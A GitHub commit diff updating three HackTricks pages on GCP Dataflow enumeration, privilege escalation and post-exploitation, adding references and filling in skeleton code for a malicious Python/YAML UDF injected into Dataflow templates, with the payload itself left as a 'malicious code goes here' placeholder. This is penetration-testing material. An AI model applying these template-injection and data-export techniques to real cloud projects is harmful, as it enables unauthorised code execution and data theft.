Skip to content

Commit cd9939d

Browse files
committed
f
1 parent 936fbc4 commit cd9939d

3 files changed

Lines changed: 28 additions & 5 deletions

File tree

src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -46,4 +46,10 @@ Dataflow templates exist to export BigQuery data. Use the appropriate template f
4646

4747
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
4848

49+
## References
50+
51+
- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
52+
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
53+
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
54+
4955
{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md

Lines changed: 15 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ gcloud dataflow jobs list --region=<region>
3737
gcloud dataflow jobs list --project=<PROJECT_ID>
3838

3939
# Describe a job to get template GCS path, staging location, and any UDF/template references
40-
gcloud dataflow jobs describe <JOB_ID> --region=<region> --format="yaml"
40+
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
4141
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
4242
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
4343
```
@@ -99,8 +99,10 @@ def _malicious_func():
9999
coordination_file = "/tmp/pwnd.txt"
100100
if os.path.exists(coordination_file):
101101
return
102-
102+
103103
# malicous code goes here
104+
with open(coordination_file, "w", encoding="utf-8") as f:
105+
f.write("done")
104106

105107
def transform(line):
106108
# Malicous code entry point - runs per line but coordination ensures once per worker
@@ -140,10 +142,15 @@ Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes val
140142
from datetime import datetime
141143
coordination_file = "/tmp/pwnd.txt"
142144
if os.path.exists(coordination_file):
143-
return
145+
return True
144146
try:
145147
import urllib.request
146-
# malicious code goes here
148+
# malicious code goes here
149+
with open(coordination_file, "w", encoding="utf-8") as f:
150+
f.write("done")
151+
except Exception:
152+
pass
153+
return True
147154
append: true
148155
- name: CleanupTransform
149156
type: MapToFields
@@ -169,5 +176,9 @@ For exploitation details, see:
169176
## References
170177

171178
- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
179+
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
180+
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
181+
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
182+
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
172183

173184
{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md

Lines changed: 7 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ A Dataflow pipeline typically includes:
1212

1313
**Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
1414

15-
**Launcher:** A short-lived Compute Engine instance that validates the template and prepares containers before the job runs.
15+
**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
1616

1717
**Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
1818

@@ -76,4 +76,10 @@ gcloud storage ls gs://<bucket>/**
7676
../gcp-persistence/gcp-dataflow-persistence.md
7777
{{#endref}}
7878

79+
## References
80+
81+
- [Dataflow overview](https://cloud.google.com/dataflow)
82+
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
83+
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
84+
7985
{{#include ../../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)